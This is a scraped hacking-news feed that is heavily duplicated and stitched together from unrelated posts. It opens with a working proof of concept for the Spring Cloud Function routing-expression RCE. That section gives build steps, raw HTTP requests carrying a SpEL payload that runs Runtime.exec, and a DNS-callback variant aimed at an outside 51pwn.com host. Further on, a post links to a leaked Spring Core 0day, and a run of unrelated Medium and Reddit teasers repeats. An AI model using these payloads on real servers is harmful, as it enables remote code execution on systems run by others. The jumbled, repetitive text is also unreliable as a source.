Hacking Articles Tips Tricks Videos Tutorials
Photo
KitPloit - PenTest Tools!
Spring-Spel-0Day-Poc - Spring-Cloud / spring-cloud-function, spring.cloud.function.routing-expression, RCE, 0day, 0-day, POC, EXP
https://blogger.googleusercontent.com/img/a/AVvXsEjllEX0XapeLrY0h1FThW6EXfGJj27BHsz37EP0rB0kSkRIddlfnaDMfD-YJUFhDHeH9X_VLtfCMjxhaCu_zbwqICWgefLmIYjMEM4e4kueN9vKU_C0k4A6eltHTwPotZFZy03IQF0Pn28On3LNx7HtIrEIAlZFrtMWn9W6kCS0FMQgaHaIgEombnYc=w640-h164 spring-cloud/spring-cloud-function RCE EXP POC https://github.com/spring-cloud/spring-cloud-function header
Spring-Spel-0Day-Poc - Spring-Cloud / spring-cloud-function, spring.cloud.function.routing-expression, RCE, 0day, 0-day, POC, EXP
https://blogger.googleusercontent.com/img/a/AVvXsEjllEX0XapeLrY0h1FThW6EXfGJj27BHsz37EP0rB0kSkRIddlfnaDMfD-YJUFhDHeH9X_VLtfCMjxhaCu_zbwqICWgefLmIYjMEM4e4kueN9vKU_C0k4A6eltHTwPotZFZy03IQF0Pn28On3LNx7HtIrEIAlZFrtMWn9W6kCS0FMQgaHaIgEombnYc=w640-h164 spring-cloud/spring-cloud-function RCE EXP POC https://github.com/spring-cloud/spring-cloud-function header
spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("open -a calculator.app") buildwget https://github.com/spring-cloud/spring-cloud-function/archive/refs/tags/v3.1.6.zip
unzip v3.1.6.zip
cd spring-cloud-function-3.1.6
cd spring-cloud-function-samples/function-sample-pojo
mvn package
java -jar ./target/function-sample-pojo-2.0.0.RELEASE.jarhttps://blogger.googleusercontent.com/img/a/AVvXsEjllEX0XapeLrY0h1FThW6EXfGJj27BHsz37EP0rB0kSkRIddlfnaDMfD-YJUFhDHeH9X_VLtfCMjxhaCu_zbwqICWgefLmIYjMEM4e4kueN9vKU_C0k4A6eltHTwPotZFZy03IQF0Pn28On3LNx7HtIrEIAlZFrtMWn9W6kCS0FMQgaHaIgEombnYc=w640-h164 get path lists for testfind . -name "*.java"|xargs -I % cat %|grep -Eo '"([^" \.\/=>\|,:\}\+\)'"'"']{8,})"'|sort -u|sed 's/"//g'...
functionRouter
uppercase
lowercase
... https://blogger.googleusercontent.com/img/a/AVvXsEjtT9tOIFERen-o92zVmjjMGrU1VOsjB44JvIq42soyvpxuwfmuHffXKZAWoLyZ2KgTDa4o-3ynuNGcSpeyScgkULF0Zbwis8was14Oze1LIyUTsSUO0VGLLZmhILqpB8ryv5WQP8sh49lpZ-jjT2UsYUqAzwK5RQcW03bkmEPZMX84rElqKMVyPjOG=w640-h454 poc1Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15 Connection: close spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("open -a /System/Applications/Calculator.app") Content-Length: 5 51pwn">POST /functionRouter HTTP/1.1
host:127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
Connection: close
spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("open -a /System/Applications/Calculator.app")
Content-Length: 5
51pwn https://blogger.googleusercontent.com/img/a/AVvXsEj5NTmUaoLsPRLc1J6VS3Etx_6N4CPx0m99McBLfeTbKonpluWT9rXgrKeCtfLg5_ADWcEju6z03vTCDzUc2cu2QuhPeKM_J7MGnFm8w14LGY-sOkVIdOcPVvsL8ERnd_fSk8OEYsWXRx_tMu_x1EwvL7UbhUZ8hYJrya0j-PKJ_8H5psLQr8DZBFNy=w640-h322 poc2POST /functionRouter HTTP/1.1
host:127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
Connection: close
spring.cloud.function.routing-expression:T(java.net.InetAddress).getByName("random87535.rce.51pwn.com")
Content-Length: 5
51pwn checkcurl -v 'https://51pwn.com/dnslog?q=random87535.rce.51pwn.com'Download Spring-Spel-0Day-Pochacking: security in practice
geo location
Is it possible to find an exact geo location without working with an (isp)
submitted by /u/kami-zx2
[link] [comments]
geo location
Is it possible to find an exact geo location without working with an (isp)
submitted by /u/kami-zx2
[link] [comments]
reddit
geo location
Is it possible to find an exact geo location without working with an (isp)
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
A Java Springcore RCE 0day exploit has been leaked. It was leaked by a Chinese security researcher who, since sharing and/or leaking it, has deleted their Twitter account.
* https://twitter.com/vxunderground/status/1509170582469943303
* https://github.com/craig/SpringCore0day
A Java Springcore RCE 0day exploit has been leaked. It was leaked by a Chinese security researcher who, since sharing and/or leaking it, has deleted their Twitter account.
We have not verified the exploit.
tl;dr big if true
Download the 0day POC here: https://share.vx-underground.org
submitted by /u/DrinkMoreCodeMore
[link] [comments]
A Java Springcore RCE 0day exploit has been leaked. It was leaked by a Chinese security researcher who, since sharing and/or leaking it, has deleted their Twitter account.
* https://twitter.com/vxunderground/status/1509170582469943303
* https://github.com/craig/SpringCore0day
A Java Springcore RCE 0day exploit has been leaked. It was leaked by a Chinese security researcher who, since sharing and/or leaking it, has deleted their Twitter account.
We have not verified the exploit.
tl;dr big if true
Download the 0day POC here: https://share.vx-underground.org
submitted by /u/DrinkMoreCodeMore
[link] [comments]
Shifting Resume for PenTesting Career
https://www.reddit.com/r/Pentesting/comments/ttcthz/shifting_resume_for_pentesting_career/
Hey All! I am currently in the InfoSec industry working as an IS Analyst and am looking to pivot into the pentesting industry here in the coming months. I was curious if you guys knew of some good resources, templates, etc. to groom my resume to be best geared towards being hired as a pentester. I think with all the learning material (HackTheBox, TryHackMe, Bug Bounties, etc), it makes it a unique situation on how to structure my resume. Any recommendations, resources, advice is greatly appreciated! Thanks guys! submitted by /u/kevinj895 (https://www.reddit.com/user/kevinj895)
[link] (https://www.reddit.com/r/Pentesting/comments/ttcthz/shifting_resume_for_pentesting_career/) [comments] (https://www.reddit.com/r/Pentesting/comments/ttcthz/shifting_resume_for_pentesting_career/)
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/Pentesting/comments/ttcthz/shifting_resume_for_pentesting_career/
Hey All! I am currently in the InfoSec industry working as an IS Analyst and am looking to pivot into the pentesting industry here in the coming months. I was curious if you guys knew of some good resources, templates, etc. to groom my resume to be best geared towards being hired as a pentester. I think with all the learning material (HackTheBox, TryHackMe, Bug Bounties, etc), it makes it a unique situation on how to structure my resume. Any recommendations, resources, advice is greatly appreciated! Thanks guys! submitted by /u/kevinj895 (https://www.reddit.com/user/kevinj895)
[link] (https://www.reddit.com/r/Pentesting/comments/ttcthz/shifting_resume_for_pentesting_career/) [comments] (https://www.reddit.com/r/Pentesting/comments/ttcthz/shifting_resume_for_pentesting_career/)
___________________________
@hacking_Attack
@Hacking_Video
reddit
Shifting Resume for PenTesting Career
Hey All! I am currently in the InfoSec industry working as an IS Analyst and am looking to pivot into the pentesting industry here in the coming...
Ambassador World Cup 2022 CTF
https://medium.com/@damaidec/ambassador-world-cup-2022-ctf-8ea0955114c9?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://medium.com/@damaidec/ambassador-world-cup-2022-ctf-8ea0955114c9?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
Ambassador World Cup 2022 CTF
This CTF was fun and informative that could help you develop your methods in finding security misconfiguration on websites. The competition…
This CTF was fun and informative that could help you develop your methods in finding security misconfiguration on websites.Continue reading on Medium » (https://medium.com/@damaidec/ambassador-world-cup-2022-ctf-8ea0955114c9?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
Ambassador World Cup 2022 CTF
This CTF was fun and informative that could help you develop your methods in finding security misconfiguration on websites. The competition…
Ambassador World Cup 2022 CTF
This CTF was fun and informative that could help you develop your methods in finding security misconfiguration on websites.Continue reading on Medium »
Read more...
This CTF was fun and informative that could help you develop your methods in finding security misconfiguration on websites.Continue reading on Medium »
Read more...
Enter the Crow Games for the opportunity to earn NFTs!
Complete some tasks, tell us about it, and join the Crow Clan! After our recent airdrop of the crow clan NFT we have decided to grow the…Continue reading on Medium »
Read more...
Complete some tasks, tell us about it, and join the Crow Clan! After our recent airdrop of the crow clan NFT we have decided to grow the…Continue reading on Medium »
Read more...
Hacking on Medium
The LAPSUS$ hack group is back again, and Facebook is a new victim
LAPSUS$
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
The LAPSUS$ hack group is back again, and Facebook is a new victim
LAPSUS$
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
The LAPSUS$ hack group is back again, and Facebook is a new victim
LAPSUS$
Hacking on Medium
CyCraft Announces Results From Latest ATT&CKⓇ Evaluations
https://cdn-images-1.medium.com/max/2400/1*slE7vhTamA_gT_ztIY97mQ.jpeg
CyCraft MDR Tested Against MITRE Engenuity-Emulated Threat Group Simulations, Latest Round Includes WizardSpider and Sandworm
Continue reading on CyCraft »
___________________________
@hacking_Attack
@Hacking_Video
CyCraft Announces Results From Latest ATT&CKⓇ Evaluations
https://cdn-images-1.medium.com/max/2400/1*slE7vhTamA_gT_ztIY97mQ.jpeg
CyCraft MDR Tested Against MITRE Engenuity-Emulated Threat Group Simulations, Latest Round Includes WizardSpider and Sandworm
Continue reading on CyCraft »
___________________________
@hacking_Attack
@Hacking_Video
Medium
CyCraft Announces Results From Latest ATT&CKⓇ Evaluations
CyCraft MDR Tested Against MITRE Engenuity-Emulated Threat Group Simulations, Latest Round Includes WizardSpider and Sandworm
Hacking on Medium
Ambassador World Cup 2022 CTF
https://cdn-images-1.medium.com/max/796/1*VFI4ovr8zu3kmDeAg5jpyg.png
This CTF was fun and informative that could help you develop your methods in finding security misconfiguration on websites.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Ambassador World Cup 2022 CTF
https://cdn-images-1.medium.com/max/796/1*VFI4ovr8zu3kmDeAg5jpyg.png
This CTF was fun and informative that could help you develop your methods in finding security misconfiguration on websites.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Ambassador World Cup 2022 CTF
This CTF was fun and informative that could help you develop your methods in finding security misconfiguration on websites. The competition…
Hacking on Medium
All Been Crypto — Week 1 April 2022
https://cdn-images-1.medium.com/max/1920/1*Kd6MhOXRlD91Gd_q6n5Blg.jpeg
We are closing the week relatively unchanged at 2,2tn market cap. Had a major rally earlier and gave away a lot of the gains yesterday…
Continue reading on Coinmonks »
___________________________
@hacking_Attack
@Hacking_Video
All Been Crypto — Week 1 April 2022
https://cdn-images-1.medium.com/max/1920/1*Kd6MhOXRlD91Gd_q6n5Blg.jpeg
We are closing the week relatively unchanged at 2,2tn market cap. Had a major rally earlier and gave away a lot of the gains yesterday…
Continue reading on Coinmonks »
___________________________
@hacking_Attack
@Hacking_Video
Medium
All Been Crypto — Week 1 April 2022
We are closing the week relatively unchanged at 2,2tn market cap. Had a major rally earlier and gave away a lot of the gains yesterday…
Hacking on Medium
로닛 브릿지 해킹사건 추적기 — Huobi, FTX, Crypto.com으로 자금이 빠져나갔다고?
https://cdn-images-1.medium.com/max/2600/1*dXmNy-KHRrDK79L7U7k7uQ.png
웁살라시큐리티의 새로운 솔루션인 CAMS와 함께라면 6억 달러 이상의 가상자산도 쉽게 모니터링 할 수 있습니다.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
로닛 브릿지 해킹사건 추적기 — Huobi, FTX, Crypto.com으로 자금이 빠져나갔다고?
https://cdn-images-1.medium.com/max/2600/1*dXmNy-KHRrDK79L7U7k7uQ.png
웁살라시큐리티의 새로운 솔루션인 CAMS와 함께라면 6억 달러 이상의 가상자산도 쉽게 모니터링 할 수 있습니다.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
로닛 브릿지 해킹사건 추적기 — Huobi, FTX, Crypto.com으로 자금이 빠져나갔다고?
웁살라시큐리티의 새로운 솔루션인 CAMS와 함께라면 6억 달러 이상의 가상자산도 쉽게 모니터링 할 수 있습니다.
Enter the Crow Games for the opportunity to earn NFTs!
https://hatsfinance.medium.com/enter-the-crow-games-for-the-opportunity-to-earn-nfts-9916aa8a12c2?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://hatsfinance.medium.com/enter-the-crow-games-for-the-opportunity-to-earn-nfts-9916aa8a12c2?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
Enter the Crow Games for the opportunity to earn NFTs!
Complete some tasks, tell us about it, and join the Crow Clan! After our recent airdrop of the crow clan NFT we have decided to grow the…
Complete some tasks, tell us about it, and join the Crow Clan!
After our recent airdrop of the crow clan NFT we have decided to grow the…Continue reading on Medium » (https://hatsfinance.medium.com/enter-the-crow-games-for-the-opportunity-to-earn-nfts-9916aa8a12c2?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
After our recent airdrop of the crow clan NFT we have decided to grow the…Continue reading on Medium » (https://hatsfinance.medium.com/enter-the-crow-games-for-the-opportunity-to-earn-nfts-9916aa8a12c2?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
Medium
Enter the Crow Games for the opportunity to earn NFTs!
Complete some tasks, tell us about it, and join the Crow Clan! After our recent airdrop of the crow clan NFT we have decided to grow the…